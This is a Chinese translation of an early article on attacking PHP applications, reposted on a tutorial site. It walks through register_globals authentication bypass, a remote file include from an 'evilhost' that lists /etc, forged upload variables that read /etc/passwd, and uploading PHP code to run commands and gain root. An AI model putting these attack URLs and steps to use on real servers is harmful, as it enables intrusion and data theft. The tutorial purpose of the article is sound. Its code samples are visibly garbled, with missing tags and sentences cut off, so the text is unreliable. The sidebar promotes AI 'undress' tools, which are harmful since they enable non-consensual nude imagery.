首頁 後端開發 php教程 如何對PHP程式中的常見漏洞進行攻擊(上)_PHP教程

如何對PHP程式中的常見漏洞進行攻擊(上)_PHP教程

Jul 21, 2016 pm 04:07 PM
php 如何 常見 攻擊 漏洞 程式 翻譯 進行

如何對PHP程式中的常見漏洞進行攻擊(上)
翻譯:analysist(分析家)
來源:http://www.china4lert.org

如何對PHP程式的常見漏洞進行攻擊(上)

原著:Shaun Clowes
翻譯:analysist

之所以翻譯這篇文章,是因為目前關於CGI安全性的文章都是拿Perl作為例子,而專門介紹ASP,PHP或JSP安全性的文章則很少。 Shaun Clowes的這篇文章比較全面地介紹了PHP的安全問題,原文可以在http://www.securereality.com.au/studyinscarlet.txt找到。

由於原文比較長,而且有相當一部分是介紹文章的背景或PHP的基礎知識,沒有涉及到PHP安全方面的內容,因此我沒有翻譯。如果你想了解這方面的知識,請參考原文。

文章主要從全局變量,遠端文件,文件上載,庫文件,Session文件,數據類型和容易出錯的函數這幾個方面分析了PHP的安全性,並且對如何增強PHP的安全性提出了一些有用的建議。

好了,廢話少說,我們言歸正傳!

[全域變數]
PHP中的變數不需要事先聲明,它們會在第一次使用時自動創建,它們的類型也不需要指定,它們會根據上下文環境自動決定。從程式設計師的角度來看,這無疑是一種極為方便的處理方法。很顯然,這也是快速開發語言的一個很有用的特點。一旦一個變數被創建了,就可以在程式中的任何地方使用。這個特點導致的結果就是程式設計師很少初始化變量,畢竟,當它們第一次創建時,他們是空的。

很顯然,基於PHP的應用程式的主函數一般都是接受使用者的輸入(主要是表單變量,上載檔案和Cookie等),然後對輸入資料進行處理,然後把結果回到客戶端瀏覽器。為了讓PHP程式碼存取使用者的輸入盡可能容易,實際上PHP就是把這些輸入資料看作全域變數來處理的。

例如:






很顯然,這會顯示一個文字方塊和提交按鈕。當使用者點擊提交按鈕時,「test.php」會處理使用者的輸入,當「test.php」運行時,「$hello」會包含使用者在文字方塊輸入的資料。從這裡我們應該看出,攻擊者可以依照自己的意願創建任意的全域變數。如果攻擊者不是透過表單輸入來呼叫“test.php”,而是直接在瀏覽器網址列輸入http://server/test.php?hello=hi&setup=no,那麼,不只“$hello”被創建,「$setup」也被創建了。

譯者註:這兩種方法也就是我們通常說的「POST」和「GET」方法。
下面的使用者認證程式碼揭露了PHP的全域變數所導致的安全性問題:

  if ($pass == "hello")
    $auth = 1;
  ...
  if ($auth == 1)
    echo "some important information";
?>

上面的程式碼先檢查使用者的密碼是否為「使用者的密碼”,如果符合的話,則設定“$auth”為“1”,即通過認證。之後如果「$suth」為「1」的話,就會顯示一些重要資訊。

表面看起來是正確的,而且我們中有相當一部分人是這樣做的,但是這段程式碼犯了想當然的錯誤,它假定「$auth」在沒有設定值的時候是空的,卻沒有想到攻擊者可以創建任何全域變數並賦值,透過類似「http://server/test.php?auth=1」的方法,我們完全可以欺騙這段程式碼,使它相信我們是已經認證過的。

因此,為了提高PHP程式的安全性,我們不能相信任何沒有明確定義的變數。如果程式中的變數很多的話,這可是一項非常艱鉅的任務。

一種常用的保護方式就是檢查數組HTTP_GET[]或POST_VARS[]中的變量,這依賴於我們的提交方式(GET或POST)。當PHP配置為開啟「track_vars」選項的話(這是預設值),使用者提交的變數就可以在全域變數和上述的陣列中取得。

但值得說明的是,PHP有四個不同的陣列變數用來處理使用者的輸入。 HTTP_GET_VARS數組用來處理GET方式提交的變量,HTTP_POST_VARS數組用於處理POST方式提交的變量,HTTP_COOKIE_VARS數組用於處理作為cookie頭提交的變量,而對於HTTP_POST_FILES數組(比較新的PHP才提供),則完全是使用者用來提交變數的一種可選方式。使用者的一個請求可以很容易的把變數存在這四個陣列中,因此一個安全的PHP程式應該要檢查這四個陣列。

[遠端檔案]
PHP是一種具有豐富特性的語言,提供了大量的函數,使程式設計者實現某個功能很容易。但從安全的角度來看,功能越多,要確保它的安全性就越難,遠端文件就是說明這個問題的一個很好的例子:

  if (! ($fd = fopen("$filename", "r"))
    echo("Could not open file: $filename
n");
?>

上面的腳本試圖開啟檔案“$filename”,如果失敗就顯示錯誤訊息。的特性,那就是它可以從任何其它WEB或FTP站點讀取文件。 「$filename」為「http://target/scripts/..� ../winnt/system32/cmd.exe?/c dir」
則上面的程式碼其實是利用主機target上的unicode漏洞,執行了dir命令。的內容,並且把它們按照PHP程式碼解釋,主要用在函式庫文件上。 🎜>?>

上例中「$libdir」一般是一個在執行程式碼前已經設定好的路徑,如果攻擊者能夠使得「$libdir」沒有被設定的話,那麼他就可以改變這個路徑。支持,攻擊者就可以做任何事。 /etc");
?>

然後把“$libdir”設定為“http:///”,這樣我們就可以在目標主機上執行上面的攻擊代碼,“ /etc」目錄的內容會作為結果返回客戶的瀏覽器。

要注意的是,攻擊伺服器(也就是evilhost)應該不能執行PHP程式碼,否則攻擊程式碼會在攻擊伺服器,而不是目標伺服器執行,如果你想了解具體的技術細節,請參考: http://www.securereality.com.au/sradv00006.txt

[檔案上載]
PHP自動支援基於RFC 1867的檔案上載,我們看下面的範例:







上面的程式碼讓使用者可以從本地機器選擇一個文件,當點擊提交後,文件就會被上載到伺服器。這顯然很有用的功能,但是PHP的反應方式使這項功能變的不安全。當PHP第一次接到這種要求,甚至在它開始解析被呼叫的PHP程式碼之前,它會先接受遠端使用者的文件,檢查文件的長度是否超過「$MAX_FILE_SIZE variable」定義的值,如果透過這些測試的話,檔案就會被存在本地的一個暫存目錄中。

因此,攻擊者可以發送任意檔案給執行PHP的主機,在PHP程式還沒有決定是否接受檔案上載時,檔案已經被存在伺服器上了。

這裡我就不討論利用檔案上載來對伺服器進行DOS攻擊的可能性了。

讓我們考慮一下處理文件上載的PHP程序,正如我們上面說的,文件被接收並且存在伺服器上(位置是在配置文件中指定的,一般是/tmp),擴展名一般是隨機的,類似“phpxXuoXG”的形式。 PHP程式需要上載檔案的資訊以便處理它,這可以透過兩種方式,一種方式是在PHP 3中已經使用的,另一種是在我們對先前的方法提出安全公告後引入的。

但是,我們可以肯定的說,問題還是存在的,大多數PHP程式還是使用老的方式來處理上載檔案。PHP設定了四個全域變數來描述上載文件,比如說上面的範例:

$hello = Filename on local machine (e.g "/tmp/phpxXuoXG")
$hello_size = Size in bytes of file (e.g 1024)
$hello_name = The original name of the file on the remote system (e.g "c:\temp\hello.txt")
$hello_type = Mime type of uploaded file (e.g "text/ plain")

然後PHP程式開始處理根據「$hello」指定的文件,問題在於「$hello」不一定是一個PHP設定的變量,任何遠端使用者都可以指定它。如果我們使用下面的方式:

http://vulnhost/vuln.php?hello=/etc/passwd&hello_size=10240&hello_type=text/plain&hello_name=hello.txt

就導致了下面的PHP全域變數(當然POST方式也可以(甚至是Cookie)):

$hello = "/etc/passwd"
$hello_size = 10240
$hello_type = "text/plain"
$hello_name = "hello.txt"

上面的表單資料正好滿足了PHP程式所期望的變量,但是這時PHP程式不再處理上載的文件,而是處理「/etc/passwd 」(通常會導致內容暴露)。這種攻擊可以用於暴露任何敏感文件的內容。

我在前面已經說了,新版本的PHP使用HTTP_POST_FILES[]來決定上載文件,同時也提供了很多函數來解決這個問題,例如有一個函數用來判斷某個文件是否實際上載的文件。這些函數很好的解決了這個問題,但是實際上肯定有很多PHP程式仍然使用舊的方法,很容易受到這種攻擊。

作為文件上載的攻擊方法的一個變種,我們看一下下面的一段程式碼:

  if (file_exists($theme)) // Checks the file exists on the local system (no remote files)
include("$theme");
?>

如果攻擊者可以控制「$theme」的話,很明顯它可以利用「$theme ”來讀取遠端系統上的任何檔案。攻擊者的最終目標是在遠端伺服器上執行任意指令,但是他無法使用遠端文件,因此,他必須得在遠端伺服器上建立PHP檔案。這乍看起來好像是不可能的,但是文件上載幫了我們這個忙,如果攻擊者先在本地機器上創建一個包含PHP代碼的文件,然後創建一個包含名為“theme”的文件域的表單,最後用這個表單通過文件上載把創建的包含PHP代碼的文件提交給上面的代碼,PHP就會把攻擊者提交的文件保存起來,並把“$theme”的值設置為攻擊者提交的文件,這樣file_exists()函數會檢查通過,攻擊者的程式碼也會執行。

取得執行任意指令的能力之後,攻擊者顯然想提升權限或者是擴大戰果,而這又需要一些伺服器上沒有的工具集,而文件上載又一次幫了我們這個忙。攻擊者可以使用檔案上載功能上載工具,把她們存在伺服器上,然後利用他們執行指令的能力,使用chmod()改變檔案的權限,然後執行。例如:攻擊者可以繞過防火牆或IDS載一個本機root攻擊程序,然後執行,這樣就獲得了root權限。



www.bkjia.comtruehttp: //www.bkjia.com/PHPjc/315244.htmlTechArticle如何對PHP程式中的常見漏洞進行攻擊(上) 翻譯:analysist(分析家) 資料來源:http: //www.china4lert.org 如何攻擊PHP程式中常見的漏洞(上)...
本網站聲明
本文內容由網友自願投稿,版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容,請聯絡admin@php.cn

熱AI工具

Undresser.AI Undress

Undresser.AI Undress

人工智慧驅動的應用程序,用於創建逼真的裸體照片

AI Clothes Remover

AI Clothes Remover

用於從照片中去除衣服的線上人工智慧工具。

Undress AI Tool

Undress AI Tool

免費脫衣圖片

Clothoff.io

Clothoff.io

AI脫衣器

Video Face Swap

Video Face Swap

使用我們完全免費的人工智慧換臉工具,輕鬆在任何影片中換臉!

熱門文章

<🎜>:泡泡膠模擬器無窮大 - 如何獲取和使用皇家鑰匙
3 週前 By 尊渡假赌尊渡假赌尊渡假赌
北端:融合系統,解釋
3 週前 By 尊渡假赌尊渡假赌尊渡假赌
Mandragora:巫婆樹的耳語 - 如何解鎖抓鉤
3 週前 By 尊渡假赌尊渡假赌尊渡假赌

熱工具

記事本++7.3.1

記事本++7.3.1

好用且免費的程式碼編輯器

SublimeText3漢化版

SublimeText3漢化版

中文版,非常好用

禪工作室 13.0.1

禪工作室 13.0.1

強大的PHP整合開發環境

Dreamweaver CS6

Dreamweaver CS6

視覺化網頁開發工具

SublimeText3 Mac版

SublimeText3 Mac版

神級程式碼編輯軟體(SublimeText3)

熱門話題

Java教學
1665
14
CakePHP 教程
1423
52
Laravel 教程
1321
25
PHP教程
1269
29
C# 教程
1249
24
PHP和Python:比較兩種流行的編程語言 PHP和Python:比較兩種流行的編程語言 Apr 14, 2025 am 12:13 AM

PHP和Python各有優勢,選擇依據項目需求。 1.PHP適合web開發,尤其快速開發和維護網站。 2.Python適用於數據科學、機器學習和人工智能,語法簡潔,適合初學者。

PHP行動:現實世界中的示例和應用程序 PHP行動:現實世界中的示例和應用程序 Apr 14, 2025 am 12:19 AM

PHP在電子商務、內容管理系統和API開發中廣泛應用。 1)電子商務:用於購物車功能和支付處理。 2)內容管理系統:用於動態內容生成和用戶管理。 3)API開發:用於RESTfulAPI開發和API安全性。通過性能優化和最佳實踐,PHP應用的效率和可維護性得以提升。

PHP:網絡開發的關鍵語言 PHP:網絡開發的關鍵語言 Apr 13, 2025 am 12:08 AM

PHP是一種廣泛應用於服務器端的腳本語言,特別適合web開發。 1.PHP可以嵌入HTML,處理HTTP請求和響應,支持多種數據庫。 2.PHP用於生成動態網頁內容,處理表單數據,訪問數據庫等,具有強大的社區支持和開源資源。 3.PHP是解釋型語言,執行過程包括詞法分析、語法分析、編譯和執行。 4.PHP可以與MySQL結合用於用戶註冊系統等高級應用。 5.調試PHP時,可使用error_reporting()和var_dump()等函數。 6.優化PHP代碼可通過緩存機制、優化數據庫查詢和使用內置函數。 7

PHP的持久相關性:它還活著嗎? PHP的持久相關性:它還活著嗎? Apr 14, 2025 am 12:12 AM

PHP仍然具有活力,其在現代編程領域中依然佔據重要地位。 1)PHP的簡單易學和強大社區支持使其在Web開發中廣泛應用;2)其靈活性和穩定性使其在處理Web表單、數據庫操作和文件處理等方面表現出色;3)PHP不斷進化和優化,適用於初學者和經驗豐富的開發者。

PHP與Python:了解差異 PHP與Python:了解差異 Apr 11, 2025 am 12:15 AM

PHP和Python各有優勢,選擇應基於項目需求。 1.PHP適合web開發,語法簡單,執行效率高。 2.Python適用於數據科學和機器學習,語法簡潔,庫豐富。

PHP和Python:代碼示例和比較 PHP和Python:代碼示例和比較 Apr 15, 2025 am 12:07 AM

PHP和Python各有優劣,選擇取決於項目需求和個人偏好。 1.PHP適合快速開發和維護大型Web應用。 2.Python在數據科學和機器學習領域佔據主導地位。

PHP與其他語言:比較 PHP與其他語言:比較 Apr 13, 2025 am 12:19 AM

PHP適合web開發,特別是在快速開發和處理動態內容方面表現出色,但不擅長數據科學和企業級應用。與Python相比,PHP在web開發中更具優勢,但在數據科學領域不如Python;與Java相比,PHP在企業級應用中表現較差,但在web開發中更靈活;與JavaScript相比,PHP在後端開發中更簡潔,但在前端開發中不如JavaScript。

PHP和Python:解釋了不同的範例 PHP和Python:解釋了不同的範例 Apr 18, 2025 am 12:26 AM

PHP主要是過程式編程,但也支持面向對象編程(OOP);Python支持多種範式,包括OOP、函數式和過程式編程。 PHP適合web開發,Python適用於多種應用,如數據分析和機器學習。

See all articles